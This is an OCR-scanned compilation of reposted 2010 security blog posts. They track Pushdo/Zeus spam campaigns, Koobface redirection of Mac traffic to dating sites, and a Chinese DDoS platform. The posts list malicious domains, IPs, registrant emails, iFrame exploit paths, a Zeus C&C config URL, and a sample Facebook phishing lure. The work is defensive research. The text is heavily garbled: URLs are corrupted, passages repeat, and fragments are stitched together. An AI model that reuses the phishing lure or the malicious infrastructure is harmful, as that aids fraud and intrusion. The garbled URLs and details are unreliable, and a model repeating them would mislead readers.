ui777f .kr - Email: jn.hadler@jkh.org.uk 
ui777f.ne .kr - Email: jn.hadler@jkh.org.uk 
ui777f.or .kr - Email: jn.hadler@jkh.org.uk 
ui777fne .kr - Email: jn.hadler@jkh.org.uk 
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ui777l.co .kr - Email: jn.hadler@jkh.org.uk 
ui777p.co .kr - Email: jn.hadler@jkh.org.uk 
ui777p .kr - Email: jn.hadler@jkh.org.uk 
ui777p.ne .kr - Email: jn.hadler@jkh.org.uk 
ui777p.or .kr - Email: jn.hadler@jkh.org.uk 
DNS servers of notice: 

nsl.raddoor .com - Email: figarro77@gmail.com 
nsl.snup-up .net - Email: dietsnak@socialworker.net 
nsl.aj-realty .net - Email: support@aj-realty.net 

nsl.aj-administration .com - Email: manager@mack.net 


nsl.aj-talentsearch .com - Email: supp@mail.net 
nsl.eurobankfinance .net - Email: termer@counsellor.com 
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nsl.hetn91 .com - Email: astrix@aol.com 
nsl.personnel-aj .com - Email: KimMlngram@aol.com 

nsl.nitroexcel .net 
nsl.fredoms .com 
nsl.ajstaffing .net 
nsl.angel-death .net 
nsl.aj-estate .com 
nsl.aj-realtors .com 
nsl.pdsproperties .com 
nsl.groupswat .com 
Upon 

execution, 

[8jsettings-file.exe 
(Trojan-Spy. Win32.Zbot.adsy), 
phones 


back 


to 


109.123.70 

.97/fh3245sq/config.bin. 

Detection rate for pdf.pdf ([9]Exploit-PDF.ac) and file.exe 
([10]Trojan.Win32.Riern). 

The structure of the iFrame is as follows: 

- atthisstage .com/uksp/in.php - 84.45.45.135 - Email: 
soakes@soakes.com 

- atthisstage .com/uksp/jquery.jxx 

- atthisstage .com/uksp/xd/pdf.pdf 
-atthisstage .com/uksp/load.php 

- atthisstage .com/uksp/file.exe 
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Russian Brides spamvertised domains part of an affiliate 
network: 

toolbarsunited .com - Email: soft.tj@gmail.com 
2006jubilee .com - Email: soft.tj@gmail.com 
avtofo .org - Email: flarnes@gmail.com 
lovesexdatings .com - Email: kauplus@li.ru 
stars-dating .com - Email: kauplus@li.ru 


avtofo.com .ua 


dinenyc .net 

cid-f5f40eflf5210d08. spaces .live.com 

cid-clb015ffelb44573.spaces .live.com 

Cid-b78f4f23e27d2b45.spaces .live.com 

cid-8d3413073f537740.spaces .live.com 

cid-205046cf66900102.spaces .live.com 

If you want to know more the inner workings of the 
Pushdo/Cutwail botnet, consider going through the 

[11] Pushdo 

/ Cutwail - An Indepth Analysis report. 

Related posts: 

[12] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 
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[13] Pushdo Injecting Bogus Swine Flu Vaccine 

[14] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[15] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[16] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [17]Dancho Danchev's 
blog. 



1 . 


http://www.vi rustotal.com/analisis/bebf6c8b3c6a29acfb7d 51 

022c0948dalec2e83d3c8aa4b4cld27cca901fd631-12635 

73013 

2 . 

http://www.virustotal.com/analisis/1933c6e274093be895c8d 

904b9a32a8f008cebc3a608622a2afd09e2ba68fa7c-12635 

73021 

3. http://ddanchev.blo as pot.com/2010/01/outlook-web- 
access-themed-spam-campai a n.html 

4. http:// a arwarner.blo as pot.com/2010/01/this-week-in- 
avalanche-zbot-zeus-bot.html 

5. https://twitter.com/avivra/status/7720494889 

6. https://twitter.com/avivra/status/7721711447 

7. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-soam-camoai a n.html 

8 . 

http://www.virustotal.com/analisis/d62d93ffa6f091db355e56 

b6db6bce9cdf683e34256d734b7c9ec6321ad917e8-12633 

98244 

9. 

http://www.virustotal.com/analisis/8fl5b24627621b74df7afl 

03fe2fef9908728a3c0bdla2afdf83947e980251cc-12633 




























96897 


10 . 

http://www.vi rustotal.com/analisis/433accd7f258cl813c6c63 

10a4a2347ee45530db839bea2663f59f2ccf6d3be3-12633 

97127 

11 . 

http://us.trendmicro.com/imperia/md/content/us/pdf/threats/ 
securitvlibrarv/studv of_oushdo.pdf 

12. http://ddanchev.blo as pot.com/2010/01/outlook-web- 
access-themed-soam-campai a n.html 

13. http://ddanchev.blo as pot.com/20Q9/12/pushdo-in i ectin a- 
bo a us-swine--nu.html 

14. http://ddanchev.blo as pot.com/2009/ll/vour-maiilbox-has- 
been-deactivated-soam.html 

15. http://ddanchev.blo as pot.com/2009/10/on a oin g -fdic- 
s oam-campai a n-serves-zeus.html 

16. http://ddanchev.blo as pot.com/2009/Q7/multitaskin a -fast- 
f1ux-botnet-that.html 


17. http://ddanchev.blo as pot.com/ 
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Follow Me on Twitter! (2010-01-18 19:05) 

Are you on Twitter? If so, [l]consider following my tweets, or 
if you're not using it you can always [2]subscribe to the RSS 
feed. 








































1. http://twitter.com/danchodanchev 

2. http://twitter.com/statuses/user_timeline/19680610.rss 
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Facebook/AOL Update Tool Spam Campaign Serving 
Crimeware and Client-Side Exploits (2010-01-26 
09:34) 

Continuing [l]the Pushdo coverage from last week, the " Your 
AOL Instant Messenger account is flagged as inactive'' 

M [2] or the latest update for the AIM'' themed campaign from 
the weekend, has once again returned to a well known 
theme, namely, the "[3] Facebook Update Tool" spam 
campaign. 

The botnet masters have introduced several new name 
servers - domain suspension is pending - but con¬ 
tinue using the same IP embedded on all the pages, for 
serving the client-side exploits, with a slight change in the 
directory structure. 

- Sample subject: Facebook Update Tool 

- Sample body: 11 Dear Facebook user, In an effort to make 
your online experience safer and more enjoyable, Facebook 
will be implementing a new login system that will affect all 
Facebook users. These changes will offer new features and 
increased account security Before you are able to use the 
new login system, you will be required to update your 
account. Click here to update your account online now. If you 
have any questions, reference our New User Guide. 




Thanks, The Facebook Team " 

- Sample URL: facebook.com.ddeassrq 
. vc/usr/Login Facebook. php?ref 

- Detection rates for scripts/crimeware/exploits: 

[4]File.exe (phones back to the currently down nekovo 

.ru/cbd/nekovo.bri); [5]IE.js; [6]IE2.js; [7]nowTrue.swf; 
[8]pdf.pdf 

- Sample iFrame exploitation structure: 109.95.114 
.251/us01d/in.php 
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- 109.95.114 .251/usOld/jquery.jxx 

- 109.95.114 .251/us01d/xd/pdf.pdf 

- 109.95.114 .251/usOld/load.php 

- 109.95.114 .251/usOld/file.exe 

- Sample typosquatted and currently active domains: 
ddeasaeq .vc - Email: mspspaceki@mad.scientist.com 
ddeasuqq .vc - Email: mspspaceki@mad.scientist.com 
ddeassrq .vc - Email: mspspaceki@mad.scientist.com 
ddeasutq .vc - Email: mspspaceki@mad.scientist.com 
ddeasauq .vc - Email: mspspaceki@mad.scientist.com 


ddeasqwq .vc - Email: mspspaceki@mad.scientist.com 
ddeasqyq .vc - Email: mspspaceki@mad.scientist.com 
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reeesassf .la - Email: palatalizefxt@popstar.com 
ukgedsa.com .hn - Email: zmamarc689@witty.com 
ukgedsc.com .vc - Email: zmamarc689@witty.com 
ukgedse.com .hn - Email: zmamarc689@witty.com 
ukgedsg.com .vc - Email: zmamarc689@witty.com 
ukgedsh.com .vc - Email: zmamarc689@witty.com 
ukgedsi .hn - Email: zmamarc689@witty.com 
ukgedsq.com .hn - Email: zmamarc689@witty.com 
ukgedsr.com .sc - Email: zmamarc689@witty.com 
ukgedst.com .sc - Email: zmamarc689@witty.com 
ukgedsu.com .vc - Email: zmamarc689@witty.com 
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ukgedsv.com .vc - Email: zmamarc689@witty.com 
ukgedsy.com .vc - Email: zmamarc689@witty.com 

- Name servers of notice: 


nsl.availname .net - 204.12.229.89 - Email: 
Larimore@yahoo.com 

nsl.sorbauto .com - 204.12.229.89 - Email: 
xtrai@email.com 

nsl.worldkinofest .com - Email: tolosal965@snail- 
mail.net 

nsl.pdsproperties .net - 92.84.23.138 - Email: 
PDSProperties@yahoo.com 

nsl.drinckclub .com - 94.23.177.147 - Email: 
excins@iname.com 

nsl.transsubmit .net - 94.23.177.147 - Email: 
Alaniz@gmail.com 

nsl.theautocompany .net - suspended 
nsl.24stophours .com - suspended 
nsl.disksilver .net - suspended 

Thankfully, quality assurance is not taken into consideration 
in this campaign - the iFrame's IP is already heav¬ 
ily blacklisted, and the crimeware sample itself attempts to 
phone back to a C &C that has been down for several days. 

The gang's activities will be updated as they happen. 

Related posts: 

[9]Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 



[10] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[11] Pushdo Injecting Bogus Swine Flu Vaccine 

[12] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[13] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[14] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

This post has been reproduced from [15]Dancho Danchev's 
blog. 

1. http://ddanchev.blo as pot.com/201Q/Ql/pushdo-servin a- 
crimeware-client-side.html 

2. http:// a arwarner.blo as pot.com/2010/01/aol-update- 
s preads-zeus-zbot.html 

3. http://ddanchev.blo as pot.com/2009/10/on a oin g -fdic- 
s pam-campai a n-serves-zeus.html 

4. 

http://www.virustotal.com/analisis/c362c51b41df7ff9c6a0f63 

3a4fbd22cd399c91221d0ed66c9fcal879d3ba8ba-12644 

64538 

5. 

http://www.virustotal.com/analisis/78f852ec4b2ad250cl096 

d5daf2ec05fflab79f75c2225cdd71df0901ef6b8dd-12644 


64978 






















6 . 


http://www.vi rustotal.com/analisis/60f61537c725d257a2edb 

86f65f5f4ab3c9871c7e9c460cblccb7466flfl4496-12644 

64983 

7. 

http://www.virustotal.com/analisis/de54327ae5b208flf4570 

4d41ef03c02758f7fl2c2f63907db70429629c44df3-12644 

64990 

8 . 

http://www.virustotal.com/analisis/63eb7672e92b590a94c08 

ef59fb8aaea069dfdd7242c78b2670d9634d65a0e9f-12644 

65015 

9. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
crimeware-client-side.html 


10. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-soam-camoai a n.html 

11. http://ddanchev.blo as pot.com/2009/12/pushdo-in i ectin a- 
bo a us-swine-flu.html 

12. http://ddanchev.blo as pot.com/2009/ll/vour-mailbox-has- 
been-deactivated-spam.html 

13. http://ddanchev.blo as pot.com/2009/10/on a oin a -fdic- 
s pam-campai a n-serves-zeus.html 


14. http://ddanchev.blo as pot.com/2009/Q7/multitaskin a -fast- 
f1ux-botnet-that.html 








































15. http://ddanchev.blo as pot.com/ 
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Inside a Commercial Chinese DIY DDoS Platform 
( 2010 - 01-26 14 : 28 ) 

With China in the focus of international fiasco (consider 
going through the [l]Google-China cyber espionage 
saga - 

FAQ) 

Related Chinese hacking/hacktivism coverage: 

[2] Localizing Open Source Malware 

[3] Custom DDoS Capabilities Within a Malware 

[4] Custom DDoS Attacks Within Popular Malware Diversifying 

[5] The FirePack Exploitation Kit Localized to Chinese 

[6] MPack and IcePack Localized to Chinese 

[7] Massive SQL Injection Attacks - the Chinese Way 

[8] A Chinese DIY Multi-Feature Malware 

[9] DIY Chinese Passwords Stealer 

[10] A Chinese Malware Downloader in the Wild 

[lljChinese Hackers Attacking U.S Department of Defense 
Networks 

[12]Chinese Hacktivists Waging People's Information Warfare 
Against CNN 




[13]The DDoS Attack Against CNN.com 

This post has been reproduced from [14]Dancho Danchev's 
blog. Follow him [15]on Twitter. 

1. http://blo a s.zdnet.com/securit v/? p = 5259 

2. http://ddanchev.blo as pot.com/2007/Q9/localizin a-o pen- 
source-malware.html 

3. http://ddanchev.blo as pot.com/2007/Q9/custom-ddos- 
ca pabilities-within-malware.html 

4. http://ddanchev.blo as pot.com/2008/05/custom-ddos- 
attacks-within- po pular.html 

5. http://ddanchev.blo as pot.com/2008/05/fireoack- 
exploitation-kit-localized-to.html 

6. http://ddanchev.blo as pot.com/20Q7/10/mpack-and- 
icepack-localized-to-chinese.html 

7. http://ddanchev.blo as pot.com/20Q8/10/massive-sa l- 
ini ection-attacks-chinese.html 

8. http://ddanchev.blo as pot.com/2008/Q5/chinese-div-multi- 
feature-malware.html 


9. http://ddanchev.blo as pot.com/2007/Q9/div-chinese- 
passwords-stealer.html 

10. http://ddanchev.blo as pot.com/2007/Q9/chinese-malware- 
downloader-in-wild.html 


11. http://ddanchev.blo as pot.com/2006/Q9/chinese-hackers- 
attackin a -us.html 










































12. http://ddanchev.blo as pot.com/2008/Q4/chinese- 
hacktivists-wa aina- peooles.html 

13. http://ddanchev.blo as pot.com/2008/Q4/ddos-attack- 
aa ainst-cnncom.html 

14. http://ddanchev.blo as pot.com/ 

15. http://twitter.com/danchodanchev 
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Inside a Commercial Chinese DIY DDoS Platform 
( 2010 - 01-26 14 : 28 ) 

With China in the focus of international fiasco (consider 
going through the [l]Google-China cyber espionage 
saga - 

FAQ) 

Related Chinese hacking/hacktivism coverage: 

[2] Localizing Open Source Malware 

[3] Custom DDoS Capabilities Within a Malware 

[4] Custom DDoS Attacks Within Popular Malware Diversifying 

[5] The FirePack Exploitation Kit Localized to Chinese 

[6] MPack and IcePack Localized to Chinese 

[7] Massive SQL Injection Attacks - the Chinese Way 

[8] A Chinese DIY Multi-Feature Malware 

[9] DIY Chinese Passwords Stealer 













[10] A Chinese Malware Downloader in the Wild 

[11] Chinese Hackers Attacking U.S Department of Defense 
Networks 

[12] Chinese Hacktivists Waging People's Information Warfare 
Against CNN 

[13] The DDoS Attack Against CNN.com 

This post has been reproduced from [14]Dancho Danchev's 
blog. Follow him [15]on Twitter. 

1. http://blo a s.zdnet.com/securit v/? p=5259 

2. http://ddanchev.blo as pot.com/2007/Q9/localizin a-o pen- 
source-malware.html 

3. http://ddanchev.blo as pot.com/2007/09/custom-ddos- 
ca pabilities-within-malware.html 

4. http://ddanchev.blo as pot.com/2008/05/custom-ddos- 
attacks-withiiin- po pular.html 

5. http://ddanchev.blo as pot.com/2008/05/fireoack- 
exploitation-kit-localized-to.html 

6. http://ddanchev.blo as pot.com/2007/10/mpack-and- 
icepack-localized-to-chinese.html 

7. http://ddanchev.blo as pot.com/20Q8/10/massive-sa l- 
ini ection-attacks-chinese.html 

8. http://ddanchev.blo as pot.com/2008/Q5/chinese-div-multi- 
feature-malware.html 


9. http://ddanchev.blo as pot.com/2007/Q9/div-chinese- 
passwords-stealer.html 



































10. http://ddanchev.blo as pot.com/2007/Q9/chinese-malware- 
downloader-in-wild.html 


11. http://ddanchev.blo as pot.com/2006/Q9/chinese-hackers- 
attackin a -us.html 

12. http://ddanchev.blo as pot.com/2008/Q4/chinese- 
hacktivists-wa aina- peoples.html 

13. http://ddanchev.blo as pot.com/2008/Q4/ddos-attack- 
aa ainst-cnncom.html 

14. http://ddanchev.blo as oot.com/ 

15. http://twitter.com/danchodanchev 
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February 
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Summarizing Zero Day's Posts for January (2010-02- 
01 22:34) 

The following is a brief summary of all of my posts at 

[1] ZDNet's Zero Day for January, 2010. You can also go 
through 

[2] previous summaries, as well as subscribe to my 

[3] personal RSS feed, [4]Zero Day's main feed, [5]follow me 
or all of [6]ZDNet's blogs on Twitter. 

Recommended reading - [7]Google-China cyber 
espionage saga - FAQ. 




















01. [8]Baidu DNS records hijacked by Iranian Cyber Army 

02. [9]Haiti earthquake themed blackhat SEO campaigns 
serving sea reware 

03. [10]Google-China cyber espionage saga - FAQ 

04. [lljAnd the most popular password is... 

05. [12]Bogus IQ test with destructive payload in the wild 

06. [13]Report: 48 % of 22 million scanned computers 
infected with malware 

This post has been reproduced from [14]Dancho Danchev's 
blog. Follow him [15]on Twitter. 

1. http://blo a s.zdnet.com/securit v 

2. http://ddanchev.blo as pot.com/2010/01/summarizin a -zero- 
davs- posts-for.html 

3. http://updates.zdnet.com/ta a s/dancho+danchev.html? 
t=Q&s=Q&o=l&mode=rss 

4. http://feeds.feedburner.com/zdnet/securit v 
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5. http://twitter.com/danchodanchev 

6. http://twitter.com/zdnetblo as 

7. http://blo a s.zdnet.com/securit v/? p=5259 

8. http://blo a s.zdnet.com/securit v/? p=5204 

9. http://blo a s.zdnet.com/securit v/? p=5244 
























10. http://blo a s.zdnet.com/securit v/? o=5259 

11. htto://blo a s.zdnet.com/securit v/? p=5325 

12. http://blo a s.zdnet.com/securit v/? o=5357 

13. http://blo a s.zdnet.com/securit v/? o=5365 

14. http://ddanchev.blp as ppt.com/ 

15. http://twitter.com/danchodanchev 
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How the Koobface Gang Monetizes Mac OS X Traffic 
(2010-02-02 18:07) 

Mac users appear to have a special place in the heart of the 
Koobface gang, since they've recently started experimenting 
with a monetization strategy especially for them - by 
compromising legitimate sites for the sole purpose of 
embedding them with the popular PHP backdoor shell C99 
(Synsta mod), in an attempt to redirect all the Mac OS X 

traffic to affiliate dating programs, such as for instance 
[l]AdultFriendFinder. 

The use of Synsta's C99 mod is not a novel approach, the 
gang has been using for over an year and a half now. The 
original KROTEG injected script, is now including a 11 hey 
rogazi" message. "Fley rogazi" appears to be some kind of 
slang 45 

















word ( rogatstsi) for scooter driving Italian people. What's 
also interesting to point out is that the Mac OS X redirection 
takes place through one of the few currently active 
centralized IPs from Koobface 1.0's infrastructure - 

61.235.117.83. 

46 




This very same IP (profiled in [2]August, 2009 and then in 
[3]September, 2009) was once brought offline thanks to the 
folks at China CERT, but quickly resumed operation, with 
Koobface 1.0's "leftovers" xtsd20090815 .com and kiano- 
180809 .com (domain was [4]serving client-side exploits in 
November 2009's experiment by the Koobfae gang, followed 
by another one again hosted at 61.235.117.83) still parked 
there. 

• Go through related web shell backdoors, monetization 
posts: [5]A Compilation of Web Backdoors; ^Mone¬ 
tizing Web Site Defacements; [7]Underground Multitasking 
in Action; [8]Monetizing Compromised Web Sites, 

[9]Web Site Defacement Groups Going Phishing 
47 




Moreover, this China-based IP (it even has a modest 
[10]Alexa pagerank) was also the centralized redirection 
point in Koobface 1.0's scareware business model using 
popup.php to redirect to a systematically updated portfolio 
of scareware domains, and the first time ever that I came 
across to what [ 11 ]the gang is now publicly acknowledging 
as the " 2008 ali baba and 40, LLC" team. 


[12] AS9394 (CRNET) itself is currently hosting the following 
active Zeus crimeware campaigns: 

[13] 6alava .com - 61.235.117.70 - Email: 
necks@corporatemail.ru 

[14] sicha-linna .com - 61.235.117.77 - Email: 
stay@bigmailbox.ru 

[15] stopspaming .com - 61.235.117.70 - Email: 
bunco@e2mail.ru 

[16] ubojnajasila .net - 61.235.117.87 - Email: 
ubojnajasila.net@contactprivacy.com 

Here's how the experiment looks like in its current form. Once 
the OS is detected, the redirection takes place 

through 61.235.117.83 /mac.php -> 61.235.117.83 
/vvv.htm loading the following pages, using the gang's 
unique campaign IDs at AdultFriendFinder: 

- BestDatingDirect .com/page hot.php?page = random 
&did=14029 

- adultfriendfinder .com/go/page/ad ffadult gonzo? 
pid=p291351.sub2w954 &lang=english 

- adultfriendfinder .com/go/page/landing page 
_geobanner?pid=g227362-ppc 
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Parked on 63.218.226.67 - AS3491; PCCWGIobal-ASN 
PCCW Global is the rest of the dating site redirectors: 


bestdatingdirect .com 
bestnetdate .com 
currentdating .com 
datefunclub .com 
enormousdating .com 
giantdating .com 
onlinelovedating .com 
worldbestdate .com 
worlddatinghere .com 

This isn't the first time that the Koobface gang is attempting 
to monetize traffic through dating affiliate net¬ 
works. In fact, in November's "[17]Koobface Botnet's 
Scareware Business Model - Part Two" post emphasizing on 
the gang's connection with blackhat SEO campaigns, the 
Bahama botnet and the [18]malvertising attacks at the web 
site of the New York Times, I also [19]pointed out on their 
connection with an [20]Ukrainian dating scam agency 
profiled before, whose botnet was also linked to [21]money 
mule recruitment campaigns in May, 2009. 

[22]An excerpt is worth a thousand words: 

The historical OSINTparagraph mentioned that several of 

the scareware domains pushed during the past two 
weeks 

were responding to 62.90.136.237 . This very same 
62.90.136.207 IP was hosting domains part of an 



[23]Ukrainiar\ 49 
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dating scam agency known as [24]Confidentia\ Connections 
earlier this year, whose spamming operations were 

linked to a [25]botnet involved in money mule recruitment 
activities. 

For the time being, the following dating scam domains are 
responding to the same IP: 

healthe-lovesite .com - Email: potenciallio@safe-mail.net 

love-isaclick .com - Email: potenciallio@safe-mail.net 

love-is-special .com - Email: potenciallio@safe-mail.net 

only-loveall .com - Email: potenciallio@safe-mail.net 

and-i-loveyoutoo .com - Email: potenciallio@safe-mail.net 

andiloveyoutoo .com - Email: menorstlO@yahoo.com 

romantic-love-forever .com - Email: potenciallio@safe- 
mail.net 

love-youloves .com - Email: potenciallio@safe-mail.net 

love-galaxys .com - Email: potenciallio@safe-mail.net 

love-formeandyou .com - Email: potenciallio@safe- 
mail.net 

ifound-thelove .net - Email: potenciallio@safe-mail.net 
findloveon .net - Email: wersers@yahoo.com 


love-isexcellent .net - Email: potenciallio@safe-mail.net 
Could it get even more malicious and fraudulent than that? 
Appreciate my rhetoric. 

The same email 
50 

(potenciallio@safe-mail.net) that was used to register the 
dating scam domains was also [26]used to register exploit 
serving domains at 195.88.190.247, [27participate in 
phishing campaigns, and register a [28[money mule 
recruitment site for the non-existent [29[Allied Insurance 
LLC. (Allied Group, Inc.). 

Of course, the money made in process looks like pocket 
change compared to the money they gang makes 

through blackhat SEO, click fraud and scareware in general - 
go through the related posts at the bottom of the 

article. But since they've previously indicated what I 
originally anticipated they'll do sooner or later, namely, start 
diversifying and experimenting due to the ever-growing 
compromised infrastructure, what they'll do next on the 

Mac front is an issue worth keeping an eye on. 

Related Koobface gang/botnet research: 

[30] The Koobface Gang Wishes the Industry "Happy 
Holidays" 

[31] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 



[32] Koobface Botnet Starts Serving Client-Side Exploits 

[33] Massive Scareware Serving Blackhat SEC), the Koobface 
Gang Style 

[34] Koobface Botnet's Scareware Business Model - Part Two 

[35] Koobface Botnet's Scareware Business Model - Part One 

[36] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[37] New Koobface campaign spoofs Adobe's Flash updater 

[38] Social engineering tactics of the Koobface botnet 

[39] Koobface Botnet Dissected in a TrendMicro Report 

[40] Movement on the Koobface Front - Part Two 

[41] Movement on the Koobface Front 

[42] Koobface - Come Out, Come Out, Wherever You Are 

[43] Dissecting Koobface Worm's Twitter Campaign 

This post has been reproduced from [44]Dancho Danchev's 
blog. Follow him [45Jon Twitter. 

1. https://secure.adultfriendfinder.eom/ p/ oartners/main.c ai 

2. http://ddanchev.blo as pot.com/2009/Q8/movement-on- 
koobface-front-part-two.html 

3. http://ddanchev.blo as pot.com/2009/Q9/koobface-botnets- 
scareware-business.html 

4. http://ddanchev.blo as pot.com/20Q9/ll/koobface-botnet- 
starts-servin a -client.html 















5. http://ddanchev.blQ as pot.com/2007/04/compilation-of- 
web-backdoors.html 

6. http://ddanchev.blo as pot.com/2008/Q6/monetizin a -web- 
site-defacements.html 

7. http://ddanchev.blo as pot.com/2008/Q6/under a round- 
mu ltitaskin a -in-action.html 

8. http://ddanchev.blo as pot.com/2008/Q7/monetizin a- 
compromised-web-sites.html 

9. http://ddanchev.blo as pot.com/2008/04/web-site- 
defacement- a roups- a oin a .html 

10. http://www.alexa.eom/siteinfo/http://61.235.117.83#rank 

11. http://ddanchev.blo as pot.com/2009/12/koobface- a an a- 
wishes-industrv-ha pp v.html 

12. http://www. a oo a le.com/safebrowsin a /dia a nostic? 
site=AS:9394 


13. https://zeustracker.abuse.ch/monitor. php? 
host=6alava.com 


14. https://zeustracker.abuse.ch/monitor. ph p?host=sicha- 
linna.com 


15. https://zeustracker.abuse.ch/monitor. php? 
host=sto ps pa mi n a .com 

16. https://zeustracker.abuse.ch/monitor. php? 
host=u bo inai asila.net 

17. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 




















































18. http://ddanchev.blo as pot.com/2009/Q9/ukrainian-fan- 
club-features.html 


19. http://ddanchev.blo as pot.com/2009/05/datin a-s oam- 
campai an- promotes-bo a us.html 

20. http://ddanchev.blo as pot.com/2009/06/datin a-s oam- 
campai an- promotes-bo a us.html 

21. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
launderin a-a rouos-spammin a .html 

22. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 
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23. http://ddanchev.blo as pot.com/2009/05/datin a-s pam- 
campai an- oromotes-bo a us.html 

24. http://ddanchev.blo as pot.com/2009/06/datin a-s oam- 
campai an- oromotes-bo a us.html 

25. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
launderin a-a roups-spammin a .html 

26. http://www.malwaredomainlist.com/forums/index. php? 
to pic=3442.0 

27. http:// a arwarner.blQ as pot.com/2009/10/microsoft-vour-e- 
mail-will-be-blocked.html 


28. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

29. http://www.bobbear.co.uk/allied-insurance-llc.html 
























































30. http://ddanchev.blo as pot.com/20Q9/12/koobface- a an a- 
wishes-industrv-ha op v.html 


31. http://ddanchev.blo as oot.com/2009/12/koobface- 
friendlv-riccom-ltd-as29550.html 

32. http://ddanchev.blo as pot.com/20Q9/ll/koobface-botnet- 
starts-servin a -client.html 

33. http://ddanchev.blo as pot.com/20Q9/ll/massive- 
scareware-servin a -blackhat-seo.html 

34. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 


35. http://ddanchev.blo as pot.com/2009/Q9/koobface- 
botnets-scareware-business.html 


36. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
redirects-facebooksHP.html 

37. htto://blo a s.zdnet.com/securit v/? o=4594 

38. http://content.zdnet.com/2346-12691 22-352597.html 

39. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
dissected-in-trendmicro.html 


40. http://ddanchev.blo as pot.com/2009/Q8/movement-on- 
koobface-front-oart-two.html 

41. http://ddanchev.blo as pot.com/2009/Q8/movement-on- 
koobface-front.html 


42. http://ddanchev.blo as pot.com/2009/Q7/koobface-come- 
out-come-out-wherever-vou.html 















































43. http://ddanchev.blo as pot.com/2009/Q7/dissectin a- 
koobface-worms-twitter.html 


44. http://ddanchev.blo as oot.com/ 

45. http://twitter.com/danchodanchev 
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How the Koobface Gang Monetizes Mac OS X Traffic 
(2010-02-02 18:07) 

Mac users appear to have a special place in the heart of the 
Koobface gang, since they've recently started experimenting 
with a monetization strategy especially for them - by 
compromising legitimate sites for the sole purpose of 
embedding them with the popular PHP backdoor shell C99 
(Synsta mod), in an attempt to redirect all the Mac OS X 

traffic to affiliate dating programs, such as for instance 
[l]AdultFriendFinder. 

The use of Synsta's C99 mod is not a novel approach, the 
gang has been using for over an year and a half now. The 
original KROTEG injected script, is now including a 11 hey 
rogazi" message. "Fley rogazi" appears to be some kind of 
slang 53 
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word ( rogatstsi) for scooter driving Italian people. What's 
also interesting to point out is that the Mac OS X redirection 
takes place through one of the few currently active 
centralized IPs from Koobface 1.0's infrastructure - 

61.235.117.83. 
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This very same IP (profiled in [2]August, 2009 and then in 
[3]September, 2009) was once brought offline thanks to the 
folks at China CERT, but quickly resumed operation, with 
Koobface 1.0's "leftovers" xtsd20090815 .com and kiano- 
180809 .com (domain was [4]serving client-side exploits in 
November 2009's experiment by the Koobfae gang, followed 
by another one again hosted at 61.235.117.83) still parked 
there. 

• Go through related web shell backdoors, monetization 
posts: [5]A Compilation of Web Backdoors; [6]Mone- 

tizing Web Site Defacements; [7]Underground Multitasking 
in Action; [8]Monetizing Compromised Web Sites, 

[9]Web Site Defacement Groups Going Phishing 
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Moreover, this China-based IP (it even has a modest 
[10]Alexa pagerank) was also the centralized redirection 
point in Koobface 1.0's scareware business model using 
popup.php to redirect to a systematically updated portfolio 
of scareware domains, and the first time ever that I came 
across to what [ 11 ]the gang is now publicly acknowledging 
as the " 2008 ali baba and 40, LLC" team. 

[12] AS9394 (CRNET) itself is currently hosting the following 
active Zeus crimeware campaigns: 

[13] 6alava .com - 61.235.117.70 - Email: 
necks@corporatemail.ru 


[14] sicha-linna .com - 61.235.117.77 - Email: 
stay@bigmailbox.ru 

[15] stopspaming .com - 61.235.117.70 - Email: 
bunco@e2mail.ru 

[16] ubojnajasila .net - 61.235.117.87 - Email: 
ubojnajasila.net@contactprivacy.com 

Here's how the experiment looks like in its current form. Once 
the OS is detected, the redirection takes place 

through 61.235.117.83 /mac.php -> 61.235.117.83 
/vvv.htm loading the following pages, using the gang's 
unique campaign IDs at AdultFriendFinder: 

- BestDatingDirect .com/page hot.php?page = random 
&did=14029 

- adultfriendfinder .com/go/page/ad ffadult gonzo? 
pid=p291351.sub2w954 &lang=english 

- adultfriendfinder .com/go/page/landing page 
_geobanner?pid=g227362-ppc 

56 




Parked on 63.218.226.67 - AS3491; PCCWGIobal-ASN 
PCCW Global is the rest of the dating site redirectors: 

bestdatingdirect .com 

bestnetdate .com 

currentdating .com 


datefunclub .com 


enormousdating .com 
giantdating .com 
onlinelovedating .com 
woridbestdate .com 
worlddatinghere .com 

This isn't the first time that the Koobface gang is attempting 
to monetize traffic through dating affiliate net¬ 
works. In fact, in November's "[17]Koobface Botnet's 
Scareware Business Model - Part Two" post emphasizing on 
the gang's connection with blackhat SEO campaigns, the 
Bahama botnet and the [18]malvertising attacks at the web 
site of the New York Times, I also [19]pointed out on their 
connection with an [20]Ukrainian dating scam agency 
profiled before, whose botnet was also linked to [21]money 
mule recruitment campaigns in May, 2009. 

[22]An excerpt is worth a thousand words: 

The historical OSINTparagraph mentioned that several of 

the scareware domains pushed during the past two 
weeks 

were responding to 62.90.136.237 . This very same 
62.90.136.207 IP was hosting domains part of an 
[23 ] Ukrainian 5 7 


dating scam agency known as [24]Confidential Connections 
earlier this year , whose spamming operations were 


linked to a [25]botnet involved in money mule recruitment 
activities. 

For the time being , the following dating scam domains are 
responding to the same IP: 

healthe-lovesite .com - Email: potenciallio@safe-mail.net 

love-isaclick .com - Email: potenciallio@safe-mail.net 

love-is-special .com - Email: potenciallio@safe-mail.net 

